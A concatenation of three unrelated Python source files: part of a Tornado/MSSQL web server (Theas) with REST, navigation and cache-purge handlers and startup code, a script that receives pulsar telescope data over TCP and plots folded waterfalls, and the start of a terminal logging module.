if 'OnAfter' in row:
this_resource.on_after = row['OnAfter']
if 'Revision' in row:
this_resource.revision = row['Revision']
if this_resource.resource_code:
self.add_resource(row['ResourceCode'], this_resource)
this_proc = None
del this_proc
return this_resource
@tornado.gen.coroutine
def post(self, resource_code=None, *args, **kwargs):
global G_cached_resources
buf = ''
try:
# spin up a new session
self.session = yield self.wait_for_session()
if self.session is None:
raise TheasServerError('Session could not be established for REST request.')
# try to find required resource
resource_code = None
resource = None
request_path = None
if len(args) > 0:
request_path = args[0]
if request_path is not None and request_path.split('/')[0] == 'r':
# Special case: an "r" as the first segment of the path, such as:
# r/resourcecode/aaa/bbb
# indicates that the second segment is to be the resource code.
# This allows URLs such as /r/img/myimg.jpg to be handled dynamically: the resource img is
# loaded, and then myimg.jpg is passed in. (Otherwise the resource would be taken to be
# img/myimg.jpg
resource_code = request_path.split('/')[1]
else:
resource_code = request_path
if resource_code and resource_code.count('.') >= 2:
# A versioned filename, i.e. my.ver.23.css for version #23 of my.css
# We just want to cut out the version, and return the unversioned
# filename as the resource code (i.e. my.css)
# That is, Theas will always / only serve up the most recent version
# of a resource. There is not support for serving up a particular
# historical version. The version number in the file name is merely
# for the browser's benefit, so that we can "cache bust" / have the
# browser request the latest version even if it has an old version in
# cache.
# For this reason, we don't really need to inspect the resources.
# We need only manipulate the resource_code to strip out the version
# number.
segments = resource_code.split('.')
if len(segments) >= 3 and 'ver' in segments:
ver_pos = segments.index('ver')
if ver_pos > 0:
resource_code = '.'.join(segments[:ver_pos]) + '.' + '.'.join(segments[ver_pos + 2:])
resource = self.get_rest_resource(resource_code, self.session)
rest_proc_name = resource.api_async_stored_proc
# allow REST to receive file uploads
self.process_uploaded_files()
form_params = self.request.body_arguments
# We want to serialize form data
form_params_str = ''
for key in form_params:
this_val = form_params[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
form_params_str = form_params_str + key + '=' + urlparse.quote(this_val) + '&'
self.session.log('REST', 'REST stored proc is: {}'.format(rest_proc_name))
proc = ThStoredProc(rest_proc_name, self.session)
if not proc.is_ok:
self.session.log('REST',
'ERROR: REST proc name {} is not valid. in ThHandler_Async.Post'.format(
rest_proc_name))
else:
proc.refresh_parameter_list()
if '@Document' in proc.parameter_list:
proc.bind(self.request.path.rsplit('/', 1)[1], _mssql.SQLCHAR, '@Document')
if '@HTTPParams' in proc.parameter_list:
proc.bind(self.request.query, _mssql.SQLCHAR, '@HTTPParams')
if '@FormParams' in proc.parameter_list:
proc.bind(form_params_str, _mssql.SQLCHAR, '@FormParams')
# Execute stored procedure
proc_result = proc.execute(fetch_rows=False)
# For the REST stored proc, we are expecting it to return only a single resultset that
# contains only a single row.
# We watch for a few special column names: RESTResponse is a column
# that the stored proc can use to return raw data that will be passed on to the browser as the
# response to the REST request. Similarly, RESTResponseBin can contain binary data
# to send to the browser. (If present and not null, RESTResponseBin will be served
# instead of RESTResponse.)
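# Note: the loop below currently reads only ErrorMessage and RESTResponse; RESTResponseBin
# is not handled here.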
row_count = 0
if proc.th_session.sql_conn is not None:
buf = ''
for row in proc.th_session.sql_conn:
row_count += 1
if 'ErrorMessage' in row:
if not row['ErrorMessage'] is None and row['ErrorMessage'] != '':
buf = 'Stored procedure returned an error:' + \
urlparse.quote(format_error(row['ErrorMessage']))
if 'RESTResponse' in row:
if row['RESTResponse'] is not None:
buf = row['RESTResponse']
assert row_count > 0, 'No result row returned by REST stored proc.'
except TheasServerError as e:
# e = sys.exc_info()[0]
err_msg = e.value if hasattr(e, 'value') else e
buf = 'theas:th:ErrorMessage=' + urlparse.quote(err_msg)
except Exception as e:
# We would like to catch specific MSSQL exceptions, but these are declared with cdef
# in _mssql.pyx ... so they are not exported to python. Should these be declared
# with cpdef?
err_msg = None
err_msg = str(e)
buf = 'theas:th:ErrorMessage=' + urlparse.quote(err_msg)
self.session.log('Async',
'ERROR when executing stored proc {}: {}'.format(
rest_proc_name, err_msg))
self.write(buf)
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
self.session.finished()
self.session = None
self.finish()
@tornado.gen.coroutine
def get(self, *args, **kwargs):
return self.post(*args, **kwargs)
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Back "back" handler
# -------------------------------------------------
class ThHandler_Back(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
if self.session is None:
# try to get the session, but do not wait for it
self.session = yield self.wait_for_session(seconds_to_wait=0)
if self.session is not None:
if len(self.session.history) > 1:
self.session.history.pop()
this_history_entry = self.session.history[-1]
self.session.theas_page.set_value('theas:th:NextPage', this_history_entry['PageName'])
self.session.log('Response', 'Sending clientside redir')
self.write(self.session.clientside_redir())
##Handle the actual form processing here. When done, we will persist session data and redirect.
# buf = yield self.background_process_post_authenticated()
##buf = self.background_process_post_authenticated()
# self.write(buf)
# self.session.log('Response', 'Sending response for back request')
self.session.finished()
else:
if self.cookies_changed():
# must perform a client-side redirect in order to set cookies
self.session.finished()
# Could redirect if desired. But instead, we'll send an error message and let the browser handle it
# self.redirect('/')
else:
# can send a normal redirect, since no cookies need to be written
# Could redirect if desired. But instead, we'll send an error message and let the browser handle it
# self.write(self.session.clientside_redir('/'))
self.session.finished()
self.session = None
self.finish()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_PurgeCache purge cache handler
# -------------------------------------------------
class ThHandler_PurgeCache(ThHandler):
def data_received(self, chunk):
pass
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
global G_cached_resources
message = 'No resource code specified. Nothing to do.'
if len(self.get_arguments('rc')) > 0:
resource_code = self.get_argument('rc')
if resource_code == '_all':
if G_cached_resources.delete_resource(resource_code=None, delete_all=True):
message = 'Purged all cached resources.'
else:
message = 'Nothing purged. Nothing in the cache.'
else:
if G_cached_resources.delete_resource(resource_code=resource_code, delete_all=False):
message = 'Purged cached resource: ' + resource_code
else:
message = 'Nothing purged. Resource code "' + resource_code + '" not found.'
message = message + ' Items remaining in cache: ' + str(G_cached_resources.len())
ThSession.cls_log('Cache', message)
self.write('<html><body>' + message + '</body></html>')
self.finish()
def get_program_directory():
program_cmd = sys.argv[0]
program_directory = ''
program_filename = ''
if program_cmd:
program_directory, program_filename = os.path.split(program_cmd)
if not program_directory:
# no path is provided if running the python script as: python myscript.py
# fall back to CWD
program_directory = os.getcwd()
if program_directory.endswith('system32'):
# a service application may return C:\Windows\System32 as the CWD
# Look to the executable path.
program_directory = os.path.dirname(sys.executable)
if program_directory.endswith('system32'):
# However this too will be returned as C:\Windows\System32 when
# running as a service on Windows Server 2012 R2. In that case...
# we are stuck.
program_directory = ''
program_directory = os.path.normpath(program_directory)
if not program_directory.endswith(os.sep):
program_directory += os.sep
return program_directory, program_filename
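# (get_program_directory() returns a (directory, filename) tuple; the directory always ends with
# os.sep, with the CWD and Windows-service fallbacks handled above.)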
# -------------------------------------------------
# ThWSHandler test websocket handler
# -------------------------------------------------
class ThWSHandler_Test(tornado.websocket.WebSocketHandler):
def open(self):
ThSession.cls_log('WebSocket', 'New client connected')
self.write_message("You are connected")
# the client sent the message
def on_message(self, message):
self.write_message('DoFetchData')
# client disconnected
def on_close(self):
ThSession.cls_log('WebSocket', 'Client disconnected')
def run(run_as_svc=False):
global G_program_options
global G_server_is_running
global G_cached_resources
global G_sessions
global G_break_handler
global LOGGING_LEVEL
global SESSION_MAX_IDLE
global REMOVE_EXPIRED_THREAD_SLEEP
global LOGIN_RESOURCE_CODE
global LOGIN_AUTO_USER_TOKEN
global REMEMBER_USER_TOKEN
global DEFAULT_RESOURCE_CODE
global FULL_SQL_IS_OK_CHECK
global FORCE_REDIR_AFTER_POST
global USE_SECURE_COOKIES
global SESSION_HEADER_NAME
global SESSION_COOKIE_NAME
global USER_COOKIE_NAME
global USE_WORKER_THREADS
global MAX_WORKERS
if LOGGING_LEVEL:
msg = 'Theas app getting ready...'
write_winlog(msg)
print(msg)
if not run_as_svc:
# Trap breaks.
G_break_handler = BreakHandler()
if G_break_handler:
G_break_handler.enable()
program_directory, program_filename = get_program_directory()
msg = 'Theas app: Program directory is: {}'.format(program_directory)
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
msg = 'Theas app: program filename is {}'.format(program_filename)
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
msg = 'Theas app: program parameters: {}'.format(str(sys.argv[1:]))
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
G_program_options = tornado.options.options
G_program_options.define("settings_path",
default=program_directory,
help="The path to the folder with configuration files.", type=str)
G_program_options.define("server_prefix",
default="locaohost:8881",
help="The web server address prefix to prepend to URLs that need it.", type=str)
G_program_options.define("port",
default=8881,
help="The TCP/IP port that the web server will listen on", type=int)
G_program_options.define("sql_server",
default=None,
help="Server name of your MSSQL server instance", type=str)
G_program_options.define("sql_port",
default=1433,
help="TCP/IP port for your MSSQL server connections", type=int)
G_program_options.define("sql_user",
help="MSSQL login user name for SQL connections", type=str)
G_program_options.define("sql_password",
help="MSSQL login password for SQL connections", type=str)
G_program_options.define("sql_database",
help="MSSQL default database for SQL connections", type=str)
G_program_options.define("sql_appname",
default="TheasServer",
help="Descriptive name for SQL connections to know the name of this application", type=str)
G_program_options.define("sql_timeout",
default=60,
help="Time (in seconds) to wait for SQL results before timing out. Zero means wait indefinitely.",
type=int)
G_program_options.define("sql_max_connections",
default=100,
help="Maximum number of simultaneous SQL connections allowed.",
type=int)
G_program_options.define("session_max_idle_minutes",
default=SESSION_MAX_IDLE,
help="Maximum idle time (in minutes) that user sessions will remain active", type=int)
G_program_options.define("session_expired_poll_seconds",
default=REMOVE_EXPIRED_THREAD_SLEEP,
help="Time (in seconds) between polls to check for expired sessions", type=int)
G_program_options.define("logging_level",
default=LOGGING_LEVEL,
help="Controls logging. 0 to disable all, 1 to enable all, or threshold to exceed.",
type=int)
G_program_options.define("login_resource_code",
default=LOGIN_RESOURCE_CODE,
help="Resource code of the login screen template.",
type=str)
G_program_options.define("login_auto_user_token",
default=LOGIN_AUTO_USER_TOKEN,
help="User token for the default (public) login.",
type=str)
G_program_options.define("remember_user_token",
default=REMEMBER_USER_TOKEN,
help="Save the user token in a cookie, and automatically log user in on future visits.",
type=bool)
G_program_options.define("default_resource_code",
default=DEFAULT_RESOURCE_CODE,
help="Resource code to use when a resource is not specified (i.e. like index.htm)",
type=str)
G_program_options.define("full_sql_is_ok_check",
default=FULL_SQL_IS_OK_CHECK,
help="Explicitly test SQL connection before each call.",
type=bool)
G_program_options.define("force_redir_after_post",
default=FORCE_REDIR_AFTER_POST,
help="After a POST, perform a redirect even if no update was requested.",
type=bool)
G_program_options.define("use_secure_cookies",
default=USE_SECURE_COOKIES,
help="When storing session and user tokens in cookies, use secure cookies.",
type=bool)
G_program_options.define("session_header_name",
default=SESSION_HEADER_NAME,
help="Name of HTTP header used to send session token.)",
type=str)
G_program_options.define("session_cookie_name",
default=SESSION_COOKIE_NAME,
help="Name of cookie used to store session token.)",
type=str)
G_program_options.define("user_cookie_name",
default=USER_COOKIE_NAME,
help="Name of cookie used to store user token (if applicable).",
type=str)
G_program_options.define("use_worker_threads",
default=USE_WORKER_THREADS,
help="Indicates if individual requests should be processed in their own thread.",
type=bool)
G_program_options.define("max_worker_threads",
default=MAX_WORKERS,
help="If use_worker_threads is true, indicates the maximum number of worker threads allowed.",
type=int)
G_program_options.parse_command_line()
msg = 'Theas app: trying to use configuration from {}'.format(G_program_options.settings_path + 'settings.cfg')
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
try:
if G_program_options.sql_server is None:
tornado.options.parse_config_file(G_program_options.settings_path + 'settings.cfg')
except Exception as e:
msg = 'Theas app: error processing settings.cfg file in {} {}'.format(
G_program_options.settings_path + 'settings.cfg',
e)
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
if G_program_options.sql_server is None:
tornado.options.print_help()
sys.exit()
# Now we have settings set in G_program_options elements.
# Some of these used a hard-coded constant as the default. (For example, we don't want hard-coded
# constants for credentials, and we don't need them for certain other values that are retrieved only
# once in our code. But for other, non-sensitive settings a constant is used.)
# But these values could have been changed by settings in the config file.
# In our code we can directly use G_program_options.xxx to access the configured values. But for readability
# (and possibly other reasons) in some cases we prefer to access the global constants directly. So we now
# want to update the value of the global constants based on what has been configured.
SESSION_MAX_IDLE = G_program_options.session_max_idle_minutes
REMOVE_EXPIRED_THREAD_SLEEP = G_program_options.session_expired_poll_seconds
LOGGING_LEVEL = int(G_program_options.logging_level)
LOGIN_RESOURCE_CODE = G_program_options.login_resource_code
LOGIN_AUTO_USER_TOKEN = G_program_options.login_auto_user_token
REMEMBER_USER_TOKEN = G_program_options.remember_user_token
DEFAULT_RESOURCE_CODE = G_program_options.default_resource_code
FULL_SQL_IS_OK_CHECK = G_program_options.full_sql_is_ok_check
FORCE_REDIR_AFTER_POST = G_program_options.force_redir_after_post
USE_SECURE_COOKIES = G_program_options.use_secure_cookies
SESSION_HEADER_NAME = G_program_options.session_header_name
SESSION_COOKIE_NAME = G_program_options.session_cookie_name
USER_COOKIE_NAME = G_program_options.user_cookie_name
USE_WORKER_THREADS = G_program_options.use_worker_threads
MAX_WORKERS = G_program_options.max_worker_threads
msg = 'Starting Theas server {} (in {}) on port {}.'.format(
program_filename, program_directory, G_program_options.port)
print(msg)
write_winlog(msg)
if not LOGGING_LEVEL:
print("Note: Logging is disabled")
global G_cached_resources
G_cached_resources = ThCachedResources() # Global list of cached resources
try:
G_cached_resources.load_global_resources()
except Exception as e:
msg = 'Theas app: error loading global cached resources when calling G_cached_resources.load_global_resources(): {}'.format(
e)
print(msg)
write_winlog(msg)
sys.exit()
G_sessions = ThSessions() # Global list of sessions
_mssql.set_max_connections(G_program_options.sql_max_connections)
if run_as_svc:
# make sure there is an ioloop in this thread (needed for Windows service)
io_loop = tornado.ioloop.IOLoop()
io_loop.make_current()
application = tornado.web.Application([
(r'/attach', ThHandler_Attach),
(r'/attach/(.*)', ThHandler_Attach),
(r'/logout', ThHandler_Logout),
(r'/login', ThHandler_Login),
(r'/back', ThHandler_Back),
(r'/purgecache', ThHandler_PurgeCache),
(r'/test', TestThreadedHandler),
(r'/testws', ThWSHandler_Test),
(r'/async', ThHandler_Async),
(r'/async/(.*)', ThHandler_Async),
(r'/(.*)', ThHandler)
# note that /r/* has special meaning, though it is handled by ThHandler. When /r/resourcecode/param1/param2
# is specified, this indicates that the resource code is "resourcecode". "param1/param2" will be passed
# in to @PathParams in the stored procedure.
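# (Illustrative example: GET /r/orders/123/456 would resolve to resource code "orders" and
# pass "123/456" in to @PathParams.)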
],
debug=False,
autoreload=False,
xsrf_cookies=True,
cookie_secret=COOKIE_SECRET)
http_server = tornado.httpserver.HTTPServer(application)
try:
http_server.listen(G_program_options.port)
except Exception as e:
msg = 'Theas app: Could not start HTTP server on port {}. Is something else already running on that port? {}'.format(
G_program_options.port, e)
print(msg)
write_winlog(msg)
sys.exit()
G_server_is_running = True
# disable Tornado's built-in logging to stderr
# see: http://stackoverflow.com/questions/21234772/python-tornado-disable-logging-to-stderr
logging.getLogger('tornado.access').disabled = True
G_sessions.start_cleanup_thread()
tornado.ioloop.PeriodicCallback(do_periodic_callback, 2000).start()
tornado.ioloop.IOLoop.instance().start()
# all_objects = muppy.get_objects()
# sum1 = summary.summarize(all_objects)
# summary.print_(sum1)
# tornado.ioloop.IOLoop.current().close()
# tornado.ioloop.IOLoop.instance().close()
msg = 'Shutting down...Exited IOLoop'
ThSession.cls_log('Shutdown', msg)
write_winlog(msg)
# ioloop = tornado.ioloop.IOLoop.current()
# ioloop.add_callback(ioloop.stop)
http_server.stop()
# ThHandler.executor.shutdown()
# ThSession.cls_log('Shutdown', 'Winding down #1')
# ThHandler_Attach.executor.shutdown()
# ThSession.cls_log('Shutdown', 'Winding down #2')
# TestThreadedHandler.executor.shutdown()
# ThSession.cls_log('Shutdown', 'Winding down #3')
http_server = None
del http_server
G_cached_resources = None
ThSession.cls_log('Shutdown', 'Winding down #4')
G_sessions.stop()
# ThSessions.remove_all_sessions()
G_sessions = None
ThSession.cls_log('Shutdown', 'Winding down #5')
if G_break_handler:
G_break_handler.disable()
msg = 'Stopped Theas server {} (in {}) on port {}.'.format(
program_filename, program_directory, G_program_options.port)
print(msg)
write_winlog(msg)
if __name__ == "__main__":
try:
# all_objects = muppy.get_objects()
# sum1 = summary.summarize(all_objects)
# summary.print_(sum1)
# gc.set_debug(gc.DEBUG_UNCOLLECTABLE | gc.DEBUG_SAVEALL)
# set_exit_handler(on_exit)
run()
ThSession.cls_log('Shutdown', 'Application has ended')
# all_objects = muppy.get_objects()
# sum1 = summary.summarize(all_objects)
# summary.print_(sum1)
# os.kill(0, signal.CTRL_BREAK_EVENT)
finally:
pass
# Clean up _mssql resources
# _mssql.exit_mssql()
|
pyPeekTCP_fold_2pol.py
|
# === Start Python 2/3 compatibility
from __future__ import absolute_import, division, print_function, unicode_literals
from future.builtins import * # noqa pylint: disable=W0401, W0614
from future.builtins.disabled import * # noqa pylint: disable=W0401, W0614
# === End Python 2/3 compatibility
from future import standard_library
standard_library.install_aliases()
import time
import threading
import socket
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib.dates as md
import datetime
import struct
import json
target = "B1133+16"
# struct IntensityHeader {
# int packet_length; // - packet length
# int header_length; // - header length
# int samples_per_packet; // - number of samples in packet (or dimensions, n_freq x n_time x n_stream?)
# int sample_type; // - data type of samples in packet
# double raw_cadence; // - raw sample cadence
# int num_freqs; // - freq list / map
# int samples_summed; // - samples summed for each datum
# uint handshake_idx; // - frame idx at handshake
# double handshake_utc; // - UTC time at handshake
# char stokes_type; // - description of stream (e.g. V / H pol, Stokes-I / Q / U / V)
# // -8 -7 -6 -5 -4 -3 -2 -1 1 2 3 4
# // YX XY YY XX LR RL LL RR I Q U V
# };
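# header_fmt below mirrors the struct above: four int32s, one double, three int32s, one uint32
# and one double (48 bytes total, matching the receive(connection, 48) handshake read below).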
header_fmt = "=iiiidiiiId"
stokes_lookup = ["YX", "XY", "YY", "XX", "LR", "RL", "LL", "RR", "I", "Q", "U", "V"]
TCP_IP = "0.0.0.0"
TCP_PORT = 2054
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((TCP_IP, TCP_PORT))
sock.listen(1)
psrcat = json.load(open("psrcat/psrcat_b.json"))["pulsars"]
psrdata = psrcat[target]
def updatefig(*args):
global waterfall, times, medsub, colorscale
tmin = md.date2num(datetime.datetime.fromtimestamp(np.amin(times)))
tmax = md.date2num(datetime.datetime.fromtimestamp(np.amax(times)))
for i in np.arange(pkt_elems):
if medsub:
p[i].set_data(
waterfall[:, :, i]
- np.nanmedian(waterfall[:, :, i], axis=0)[np.newaxis, :]
)
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(
tmpdata - np.median(tmpdata, axis=0)[np.newaxis, :]
)
else:
p[i].set_data(waterfall[:, :, i])
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(tmpdata)
p[i].set_extent([freqlist[0, 0], freqlist[-1, -1], tmin, tmax])
p[i].set_clim(vmin=colorscale[0], vmax=colorscale[1])
p[pkt_elems + i].set_clim(vmin=colorscale[0] / 10, vmax=colorscale[1] / 10)
return (p,)
def receive(connection, length):
chunks = []
bytes_recd = 0
while bytes_recd < length:
chunk = connection.recv(min(length - bytes_recd, 2048))
if chunk == b"":
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b"".join(chunks)
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
print(len(packed_header), packed_header)
tcp_header = struct.unpack(header_fmt, packed_header)
pkt_length = tcp_header[0] # packet_length
pkt_header = tcp_header[1] # header_length
pkt_samples = tcp_header[2] # samples_per_packet
pkt_dtype = tcp_header[3] # sample_type
pkt_raw_cad = tcp_header[4] # raw_cadence
pkt_freqs = tcp_header[5] # num_freqs
pkt_elems = tcp_header[6]  # num_elems (number of streams / polarizations)
pkt_int_len = tcp_header[7] # samples_summed
pkt_idx0 = tcp_header[8] # handshake_idx
pkt_utc0 = tcp_header[9] # handshake_utc
print(tcp_header)
sec_per_pkt_frame = pkt_raw_cad * pkt_int_len
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
freqlist = np.fromstring(info_header[: pkt_freqs * 4 * 2], dtype=np.float32).reshape(
-1, 2
) # .mean(axis=1)
freqlist = freqlist / 1e6
elemlist = np.fromstring(info_header[pkt_freqs * 4 * 2 :], dtype=np.int8)
plot_freqs = pkt_freqs // 8  # must stay an integer: used below as an array dimension and reshape factor
# freqlist = freqlist.reshape(-1,plot_freqs).mean(axis=1)
plot_times = 256 * 2
plot_phase = 128
total_integration = 1024 * 4
if pkt_int_len > total_integration:
print("Pre-integrated to longer than desired time!")
print("{} vs {}".format(pkt_int_len, total_integration))
print("Resetting integration length to {}".format(pkt_int_len))
total_integration = pkt_int_len
local_integration = total_integration // pkt_int_len
waterfall = np.zeros((plot_times, plot_freqs, pkt_elems), dtype=np.float32) + np.nan
countfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
fold_period = 1.0 / psrdata["frequency"]
waterfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
times = np.zeros(plot_times)
def data_listener():
global waterfall, waterfold, countfold
global times, total_integration
last_idx = pkt_idx0
data_pkt_frame_idx = 0
data_pkt_samples_summed = 1
idx = 0
while True:
d = np.zeros([pkt_freqs, pkt_elems])
n = np.zeros([pkt_freqs, pkt_elems])
t = np.zeros(plot_times)
waterfold *= 0.999
countfold *= 0.999
for _ in np.arange(local_integration * pkt_elems):
data = receive(connection, pkt_length + pkt_header)
if len(data) != pkt_length + pkt_header:
print("Lost Connection!")
connection.close()
return
(
data_pkt_frame_idx,
data_pkt_elem_idx,
data_pkt_samples_summed,
) = struct.unpack("III", data[:pkt_header])
d[:, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32) * 1.0
)
n[:, data_pkt_elem_idx] += data_pkt_samples_summed * 1.0
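# fold_idx maps this packet's absolute time (frame index * raw cadence * samples summed) onto a
# pulse-phase bin in [0, plot_phase), folding modulo the pulsar period with a half-period offset.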
fold_idx = np.array(
(
(sec_per_pkt_frame * data_pkt_frame_idx + 0.5 * fold_period)
% fold_period
)
/ fold_period
* plot_phase,
dtype=np.int32,
)
waterfold[fold_idx, :, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32)
.reshape(-1, pkt_freqs // plot_freqs)
.mean(axis=1)
)
countfold[fold_idx, :, data_pkt_elem_idx] += data_pkt_samples_summed
roll_idx = (data_pkt_frame_idx - last_idx) // local_integration
times = np.roll(times, roll_idx)
times[0] = sec_per_pkt_frame * (data_pkt_frame_idx - pkt_idx0) + pkt_utc0
# print(d,n)
waterfall = np.roll(waterfall, roll_idx, axis=0)
waterfall[0, :, :] = 10 * np.log10(
(d / n).reshape(-1, pkt_freqs // plot_freqs, pkt_elems).mean(axis=1)
)
if np.mean(n) != total_integration:
print(np.mean(n), np.std(n))
last_idx = data_pkt_frame_idx
thread = threading.Thread(target=data_listener)
thread.daemon = True
thread.start()
time.sleep(1)
f, ax = plt.subplots(2, pkt_elems, gridspec_kw={"height_ratios": [2, 1]})
f.subplots_adjust(right=0.8)
if pkt_elems == 1:
ax = np.array(ax).reshape(2, 1)  # keep ax two-dimensional so ax[row, col] indexing below still works
plt.ioff()
p = []
tmin = md.date2num(
datetime.datetime.fromtimestamp(
pkt_utc0 - plot_times * local_integration * sec_per_pkt_frame
)
)
tmax = md.date2num(datetime.datetime.fromtimestamp(pkt_utc0))
times = pkt_utc0 - np.arange(plot_times) * local_integration * sec_per_pkt_frame
date_format = md.DateFormatter("%H:%M:%S")
medsub = True
colorscale = [-0.5, 0.5]
for i in np.arange(pkt_elems):
p.append(
ax[0, i].imshow(
waterfall[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], tmin, tmax],
)
)
ax[0, i].set_yticklabels([])
ax[0, i].yaxis_date()
ax[0, 0].set_title(stokes_lookup[elemlist[0] + 8])
ax[0, 1].set_title(stokes_lookup[elemlist[1] + 8])
ax[0, 0].set_ylabel("Local Time")
ax[0, 0].yaxis_date()
ax[0, 0].yaxis.set_major_formatter(date_format)
for i in np.arange(pkt_elems):
p.append(
ax[1, i].imshow(
waterfold[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], 0, 1],
)
)
ax[1, i].set_xlabel("Freq (MHz)")
ax[1, 0].set_ylabel("Pulse Phase")
cbar_ax = f.add_axes([0.85, 0.15, 0.05, 0.7])
c = f.colorbar(p[0], cax=cbar_ax)
c.set_label("Power (dB, arbitrary)")
from matplotlib.widgets import Button
rax = plt.axes([0.82, 0.03, 0.15, 0.04])
check = Button(rax, "Med Subtract")
def func(event):
global medsub, check, colorscale
medsub = not medsub
if medsub:
check.label.set_text("Med Subtracted")
colorscale = [-0.5, 0.5]
else:
check.label.set_text("Raw Power")
colorscale = [-10, 10]
check.on_clicked(func)
ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100)
f.show()
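# --- Hedged test-sender sketch (not part of the original script) ---
# Defines a helper that connects to the listener above and sends a fabricated handshake so the
# header-parsing path can be exercised without a real instrument; every field value here is an
# illustrative assumption, not a real telescope configuration.
def send_fake_handshake(host="127.0.0.1", port=2054, n_freqs=1024, n_elems=2):
    pkt_header_len = 12          # three uint32s of per-packet metadata
    pkt_length = n_freqs * 4     # one uint32 per frequency channel
    header = struct.pack(
        "=iiiidiiiId",
        pkt_length, pkt_header_len, n_freqs, 0,   # packet_length, header_length, samples_per_packet, sample_type
        2.56e-6,                                  # raw_cadence (s), illustrative
        n_freqs, n_elems, 1024,                   # num_freqs, num_elems, samples_summed
        0, 1500000000.0)                          # handshake_idx, handshake_utc
    freqs = np.linspace(400e6, 800e6, n_freqs * 2).astype(np.float32)   # per-channel band edges
    elems = np.array([-6, -5][:n_elems], dtype=np.int8)                 # YY, XX polarizations
    with socket.create_connection((host, port)) as s:
        s.sendall(header + freqs.tobytes() + elems.tobytes())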
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List, Optional, Sequence # noqa
LOG = logging.getLogger(__name__) # type: logging.Logger
PERFORMANCE = 15 # type: int
PROMPT = 50 # type: int
SUCCESS = 60 # type: int
stdout = io.StringIO(newline="") # type: io.StringIO
class Color:
YELLOW = "\033[33m" # type: str
RED = "\033[31m" # type: str
class Format:
BOLD = "\033[1m" # type: str
CLEAR_LINE = "\x1b[0G\x1b[K" # type: str
CLEAR = "\033[0m" # type: str
TRUNCATE_OVERFLOW = "\033[?7l" # type: str
WRAP_OVERFLOW = "\033[?7h" # type: str
NEWLINE = "\n" # type: str
CURSOR_UP_LINE = "\x1b[1A" # type: str
HIDE_CURSOR = "\x1b[?25l" # type: str
SHOW_CURSOR = "\x1b[?25h" # type: str
class Character:
LAMBDA = "ƛ" # type: str
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5 # type: float
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"] # type: Sequence[str]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = "" # type: str
self.setLevel(logging.INFO)
self._record = None # type: Optional[logging.LogRecord]
self._last_record = None # type: Optional[logging.LogRecord]
self._active_lines = 0 # type: int
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.TRUNCATE_OVERFLOW
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
